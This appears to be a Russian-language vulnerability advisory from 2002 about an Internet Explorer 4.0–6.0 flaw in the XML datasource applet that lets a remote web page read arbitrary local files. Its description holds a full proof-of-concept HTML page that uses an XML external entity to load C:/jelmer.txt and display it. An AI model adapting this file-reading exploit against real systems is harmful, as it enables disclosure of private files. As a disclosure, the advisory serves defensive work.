Доступ к произвольным файлам в в Microsoft Internet Explorer XML Datasource Applet
| Дата публикации: | 20.08.2002 |
| Всего просмотров: | 1215 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Из-за ошибки в апплете datasource, возможно просмотреть любой файл на диске через удаленную Web страницу. Пример: (отображает содержание файла C:/jelmer.txt):
<html>
<head>
<base href="file:///C:/">
</head>
<body>
<applet code="com.ms.xml.dso.XMLDSO.class"
width="0" height="0" id="xmldso" MAYSCRIPT="true">
<?xml version="1.0"?>
<!DOCTYPE file [
<!ELEMENT file (#PCDATA) >
<!ENTITY contents SYSTEM "file:///C:/jelmer.txt">
]>
<file>
&contents;
</file>
</applet>
<script language="javascript">
setTimeout("showIt()",2000);
function showIt() {
var jelmer = xmldso.getDocument();
alert(jelmer.Text);
}
</script>
</body>
</html>
уязвимость обнаружена в Microsoft Internet Explorer 4.0-6.0
|
| Ссылки: | Internet explorer can read local files |